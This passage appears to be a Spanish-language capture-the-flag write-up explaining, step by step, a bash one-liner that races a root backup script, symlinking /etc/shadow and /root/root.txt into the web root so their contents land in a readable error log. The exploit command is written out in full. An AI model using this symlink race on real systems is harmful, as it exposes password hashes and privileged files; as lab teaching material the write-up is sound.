until [[ $(find /var/tmp/ -maxdepth 1 -type f -name '.*') ]] ; do sleep 3 ; done ; mv /var/www/html/index.html /tmp/index.html ; mv /var/www/html/robots.txt /tmp/robots.txt ; ln -s /etc/shadow /var/www/html/index.html ; ln -s /root/root.txt /var/www/html/robots.txt ; until [[ ! $(ps aux | grep backuperer | grep -v grep) ]] ; do sleep 3 ; done ; unlink /var/www/html/index.html ; unlink /var/www/html/robots.txt ; mv /tmp/index.html /var/www/html/index.html ; mv /tmp/robots.txt /var/www/html/robots.txt ; cat /var/backups/onuma_backup_error.txt

Como dijo Jack el destripador, vayamos por partes:

until [[ $(find /var/tmp/ -maxdepth 1 -type f -name '.*') ]] ; do sleep 3 ; done ;

  • Hasta que elfindcomando encuentre un nombre de archivo que comience con.en/var/tmpsuspensión durante 3 segundos en un bucle continuo

  • Una vez hecho esto, se ejecutará la siguiente serie de comandos.

mv /var/www/html/index.html /tmp/index.html ; 
mv /var/www/html/robots.txt /tmp/robots.txt ; 
ln -s /etc/shadow /var/www/html/index.html ; 
ln -s /root/root.txt /var/www/html/robots.txt ;

  • Realiza una copia de seguridad del original index.htmly robots.txtlos archivos en el /tmpdirectorio

  • Crea un enlace simbólico de /etc/shadowa/var/www/html/index.html

  • Crea un enlace simbólico de /root/root.txta/var/www/html/robots.txt

  • Luego, una vez integrity_chk()comparado /var/www/htmlcon /var/tmp/check/var/www/html, los index.htmly los robots.txten /var/tmp/checkserán diferentes de los de /var/www/htmly las líneas diferenciales se escribirán en el registro de errores.

until [[ ! $(ps aux | grep backuperer | grep -v grep) ]] ; do sleep 3 ; done ; unlink /var/www/html/index.html ; unlink /var/www/html/robots.txt ; mv /tmp/index.html /var/www/html/index.html ; mv /tmp/robots.txt /var/www/html/robots.txt ; cat /var/backups/onuma_backup_error.txt

  • Esta última parte es solo una pequeña limpieza. Hasta que el /usr/sbin/backupererproceso finalice, suspenda el sistema repetidamente durante 3 segundos.

  • Luego, se encarga de borrar los enlaces simbólicos y retaurar los archivos originales desde/tmp

  • Finalmente, muestra el contenido del archivo de error.

🎮
🟩